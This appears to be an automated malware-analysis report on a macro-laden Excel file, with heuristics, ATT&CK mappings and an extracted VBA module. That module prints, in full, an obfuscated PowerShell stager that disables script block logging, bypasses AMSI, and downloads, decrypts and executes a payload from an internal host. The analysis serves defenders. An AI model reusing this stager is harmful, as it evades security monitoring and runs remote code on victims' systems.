MALICIOUS
82
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1566.001 Spearphishing Attachment
The critical heuristic 'OLE_VBA_PS' indicates a PowerShell reference within the VBA macros. The extracted VBA script contains obfuscated PowerShell code that attempts to disable script block logging and AMSI, then downloads a payload from 'http://192.168.1.4:80/news.php'. This suggests the document is a malicious attachment designed to download and execute further malware.
Heuristics 3
-
VBA project inside OOXML medium 1 related finding OOXML_VBADocument contains a VBA project — VBA macros present
-
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBA
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://192.168.1.4:80 In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2429 bytes |
SHA-256: 700cff03204073488c70206af8d99615add792b3f1e9b535c26f8268f3d817be |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub wdwdw()
If($PSVerSiOnTable.PSVERsIOn.MAjOr -Ge 3){$GPF=[rEf].AssEMBly.GetTYpE('System.Management.Automation.Utils')."GEtFiE`LD"('cachedGroupPolicySettings','N'+'onPublic,Static');If($GPF){$GPC=$GPF.GetValUe($null);If($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$VAL=[CollEcTioNS.GEneRIc.DICTIONArY[sTRIng,SYSTEm.ObjeCt]]::nEw();$val.AdD('EnableScriptB'+'lockLogging',0);$val.ADD('EnableScriptBlockInvocationLogging',0);$GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$val}ElSe{[ScRIPtBloCk]."GetFiE`ld"('signatures','N'+'onPublic,Static').SETVAlue($NuLl,(NeW-OBJEcT ColLecTIoNS.GENeRic.HashSEt[STRING]))}[ReF].ASsembLY.GETTypE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GetFIELd('amsiInitFailed','NonPublic,Static').SETVALue($nULl,$tRUE)};};[SYSTEm.NET.SErviCEPoINtMANaGer]::EXPECT100ContInuE=0;$Wc=NeW-ObjeCT SYSTEM.NEt.WEBClIEnt;$u='Mozilla/5.0 (Windo
ws NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$WC.HEadErs.ADd('User-Agent',$u);$Wc.ProXy=[SYStEM.NEt.WEbREQUest]::DeFaUlTWebProXy;$wC.ProXy.CREDENtIALs = [SysTEm.NeT.CredeNtIalCaCHe]::DEfaultNetwOrKCrEdENTIAls;$Script:Proxy = $wc.Proxy;$K=[SystEm.TeXt.EncoDINg]::ASCII.GetBYtES('[r%(f50yE{Lx/)Q>nt8Fd@&S*UAGBl3-');$R={$D,$K=$ARgS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COuNT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-BXOr$S[($S[$I]+$S[$H])%256]}};$ser='http://192.168.1.4:80';$t='/news.php';$wC.HeAdERs.AdD("Cookie","session=MOZlhmTBfT4NLh4khUQ55eDZNJE=");$dAtA=$WC.DOwnLoaDDATA($SeR+$t);$iv=$DAta[0..3];$DatA=$DAta[4..$DaTA.lenGth];-JOin[ChaR[]](& $R $data ($IV+$K))|IEX
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 13824 bytes |
SHA-256: 8de3039c5ad296fcd5b724131913fdc7c5e4ead9e67f80fcded16108f44f93f5 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.